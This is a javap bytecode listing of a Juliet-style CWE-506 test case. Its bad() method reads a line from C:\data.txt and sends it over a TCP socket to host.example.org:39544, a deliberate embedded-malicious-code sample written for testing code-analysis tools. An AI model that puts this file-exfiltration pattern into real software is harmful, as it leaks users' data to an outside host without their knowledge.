Compiled from "CWE506_Embedded_Malicious_Code__file_transfer_connect_tcp_15.java"
public class testcases.CWE506_Embedded_Malicious_Code.CWE506_Embedded_Malicious_Code__file_transfer_connect_tcp_15 extends testcasesupport.AbstractTestCaseBadOnly {
  public testcases.CWE506_Embedded_Malicious_Code.CWE506_Embedded_Malicious_Code__file_transfer_connect_tcp_15();
    Code:
       0: aload_0
       1: invokespecial #1                  // Method testcasesupport/AbstractTestCaseBadOnly."<init>":()V
       4: return

  public void bad() throws java.lang.Throwable;
    Code:
       0: bipush        7
       2: lookupswitch  { // 1
                     7: 20
               default: 691
          }
      20: ldc           #7                  // String
      22: astore_1
      23: new           #9                  // class java/io/File
      26: dup
      27: ldc           #11                 // String C:\\data.txt
      29: invokespecial #13                 // Method java/io/File."<init>":(Ljava/lang/String;)V
      32: astore_2
      33: aconst_null
      34: astore_3
      35: aconst_null
      36: astore        4
      38: aconst_null
      39: astore        5
      41: new           #16                 // class java/io/FileInputStream
      44: dup
      45: aload_2
      46: invokespecial #18                 // Method java/io/FileInputStream."<init>":(Ljava/io/File;)V
      49: astore_3
      50: new           #21                 // class java/io/InputStreamReader
      53: dup
      54: aload_3
      55: ldc           #23                 // String UTF-8
      57: invokespecial #25                 // Method java/io/InputStreamReader."<init>":(Ljava/io/InputStream;Ljava/lang/String;)V
      60: astore        4
      62: new           #28                 // class java/io/BufferedReader
      65: dup
      66: aload         4
      68: invokespecial #30                 // Method java/io/BufferedReader."<init>":(Ljava/io/Reader;)V
      71: astore        5
      73: aload         5
      75: invokevirtual #33                 // Method java/io/BufferedReader.readLine:()Ljava/lang/String;
      78: astore_1
      79: aload         5
      81: ifnull        89
      84: aload         5
      86: invokevirtual #37                 // Method java/io/BufferedReader.close:()V
      89: goto          107
      92: astore        6
      94: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
      97: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     100: ldc           #54                 // String Error closing BufferedReader
     102: aload         6
     104: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     107: aload         4
     109: ifnull        117
     112: aload         4
     114: invokevirtual #62                 // Method java/io/InputStreamReader.close:()V
     117: goto          135
     120: astore        6
     122: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     125: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     128: ldc           #63                 // String Error closing InputStreamReader
     130: aload         6
     132: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     135: aload_3
     136: ifnull        143
     139: aload_3
     140: invokevirtual #65                 // Method java/io/FileInputStream.close:()V
     143: goto          351
     146: astore        6
     148: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     151: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     154: ldc           #66                 // String Error closing FileInputStream
     156: aload         6
     158: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     161: goto          351
     164: astore        6
     166: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     169: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     172: ldc           #68                 // String Error with stream reading
     174: aload         6
     176: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     179: aload         5
     181: ifnull        189
     184: aload         5
     186: invokevirtual #37                 // Method java/io/BufferedReader.close:()V
     189: goto          207
     192: astore        6
     194: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     197: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     200: ldc           #54                 // String Error closing BufferedReader
     202: aload         6
     204: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     207: aload         4
     209: ifnull        217
     212: aload         4
     214: invokevirtual #62                 // Method java/io/InputStreamReader.close:()V
     217: goto          235
     220: astore        6
     222: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     225: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     228: ldc           #63                 // String Error closing InputStreamReader
     230: aload         6
     232: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     235: aload_3
     236: ifnull        243
     239: aload_3
     240: invokevirtual #65                 // Method java/io/FileInputStream.close:()V
     243: goto          351
     246: astore        6
     248: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     251: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     254: ldc           #66                 // String Error closing FileInputStream
     256: aload         6
     258: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     261: goto          351
     264: astore        7
     266: aload         5
     268: ifnull        276
     271: aload         5
     273: invokevirtual #37                 // Method java/io/BufferedReader.close:()V
     276: goto          294
     279: astore        8
     281: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     284: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     287: ldc           #54                 // String Error closing BufferedReader
     289: aload         8
     291: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     294: aload         4
     296: ifnull        304
     299: aload         4
     301: invokevirtual #62                 // Method java/io/InputStreamReader.close:()V
     304: goto          322
     307: astore        8
     309: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     312: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     315: ldc           #63                 // String Error closing InputStreamReader
     317: aload         8
     319: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     322: aload_3
     323: ifnull        330
     326: aload_3
     327: invokevirtual #65                 // Method java/io/FileInputStream.close:()V
     330: goto          348
     333: astore        8
     335: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     338: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     341: ldc           #66                 // String Error closing FileInputStream
     343: aload         8
     345: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     348: aload         7
     350: athrow
     351: aconst_null
     352: astore        6
     354: aconst_null
     355: astore        7
     357: aconst_null
     358: astore        8
     360: new           #70                 // class java/net/Socket
     363: dup
     364: ldc           #72                 // String host.example.org
     366: ldc           #74                 // int 39544
     368: invokespecial #75                 // Method java/net/Socket."<init>":(Ljava/lang/String;I)V
     371: astore        6
     373: new           #78                 // class java/io/OutputStreamWriter
     376: dup
     377: aload         6
     379: invokevirtual #80                 // Method java/net/Socket.getOutputStream:()Ljava/io/OutputStream;
     382: ldc           #23                 // String UTF-8
     384: invokespecial #84                 // Method java/io/OutputStreamWriter."<init>":(Ljava/io/OutputStream;Ljava/lang/String;)V
     387: astore        7
     389: new           #87                 // class java/io/BufferedWriter
     392: dup
     393: aload         7
     395: invokespecial #89                 // Method java/io/BufferedWriter."<init>":(Ljava/io/Writer;)V
     398: astore        8
     400: aload_1
     401: ifnull        410
     404: aload         8
     406: aload_1
     407: invokevirtual #92                 // Method java/io/BufferedWriter.write:(Ljava/lang/String;)V
     410: aload         8
     412: ifnull        420
     415: aload         8
     417: invokevirtual #95                 // Method java/io/BufferedWriter.close:()V
     420: goto          438
     423: astore        9
     425: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     428: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     431: ldc           #96                 // String Error closing BufferedWriter
     433: aload         9
     435: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     438: aload         7
     440: ifnull        448
     443: aload         7
     445: invokevirtual #98                 // Method java/io/OutputStreamWriter.close:()V
     448: goto          466
     451: astore        9
     453: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     456: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     459: ldc           #99                 // String Error closing OutputStreamWriter
     461: aload         9
     463: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     466: aload         6
     468: ifnull        476
     471: aload         6
     473: invokevirtual #101                // Method java/net/Socket.close:()V
     476: goto          688
     479: astore        9
     481: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     484: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     487: ldc           #102                // String Error closing Socket
     489: aload         9
     491: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     494: goto          688
     497: astore        9
     499: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     502: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     505: ldc           #104                // String Error with stream writing
     507: aload         9
     509: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     512: aload         8
     514: ifnull        522
     517: aload         8
     519: invokevirtual #95                 // Method java/io/BufferedWriter.close:()V
     522: goto          540
     525: astore        9
     527: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     530: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     533: ldc           #96                 // String Error closing BufferedWriter
     535: aload         9
     537: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     540: aload         7
     542: ifnull        550
     545: aload         7
     547: invokevirtual #98                 // Method java/io/OutputStreamWriter.close:()V
     550: goto          568
     553: astore        9
     555: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     558: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     561: ldc           #99                 // String Error closing OutputStreamWriter
     563: aload         9
     565: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     568: aload         6
     570: ifnull        578
     573: aload         6
     575: invokevirtual #101                // Method java/net/Socket.close:()V
     578: goto          688
     581: astore        9
     583: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     586: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     589: ldc           #102                // String Error closing Socket
     591: aload         9
     593: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     596: goto          688
     599: astore        10
     601: aload         8
     603: ifnull        611
     606: aload         8
     608: invokevirtual #95                 // Method java/io/BufferedWriter.close:()V
     611: goto          629
     614: astore        11
     616: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     619: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     622: ldc           #96                 // String Error closing BufferedWriter
     624: aload         11
     626: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     629: aload         7
     631: ifnull        639
     634: aload         7
     636: invokevirtual #98                 // Method java/io/OutputStreamWriter.close:()V
     639: goto          657
     642: astore        11
     644: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     647: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     650: ldc           #99                 // String Error closing OutputStreamWriter
     652: aload         11
     654: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     657: aload         6
     659: ifnull        667
     662: aload         6
     664: invokevirtual #101                // Method java/net/Socket.close:()V
     667: goto          685
     670: astore        11
     672: getstatic     #42                 // Field testcasesupport/IO.logger:Ljava/util/logging/Logger;
     675: getstatic     #48                 // Field java/util/logging/Level.WARNING:Ljava/util/logging/Level;
     678: ldc           #102                // String Error closing Socket
     680: aload         11
     682: invokevirtual #56                 // Method java/util/logging/Logger.log:(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V
     685: aload         10
     687: athrow
     688: goto          696
     691: ldc           #106                // String Benign, fixed string
     693: invokestatic  #108                // Method testcasesupport/IO.writeLine:(Ljava/lang/String;)V
     696: return
    Exception table:
       from    to  target type
          79    89    92   Class java/io/IOException
         107   117   120   Class java/io/IOException
         135   143   146   Class java/io/IOException
          41    79   164   Class java/io/IOException
         179   189   192   Class java/io/IOException
         207   217   220   Class java/io/IOException
         235   243   246   Class java/io/IOException
          41    79   264   any
         164   179   264   any
         266   276   279   Class java/io/IOException
         294   304   307   Class java/io/IOException
         322   330   333   Class java/io/IOException
         264   266   264   any
         410   420   423   Class java/io/IOException
         438   448   451   Class java/io/IOException
         466   476   479   Class java/io/IOException
         360   410   497   Class java/io/IOException
         512   522   525   Class java/io/IOException
         540   550   553   Class java/io/IOException
         568   578   581   Class java/io/IOException
         360   410   599   any
         497   512   599   any
         601   611   614   Class java/io/IOException
         629   639   642   Class java/io/IOException
         657   667   670   Class java/io/IOException
         599   601   599   any

  public static void main(java.lang.String[]) throws java.lang.ClassNotFoundException, java.lang.InstantiationException, java.lang.IllegalAccessException;
    Code:
       0: aload_0
       1: invokestatic  #111                // Method mainFromParent:([Ljava/lang/String;)V
       4: return
}
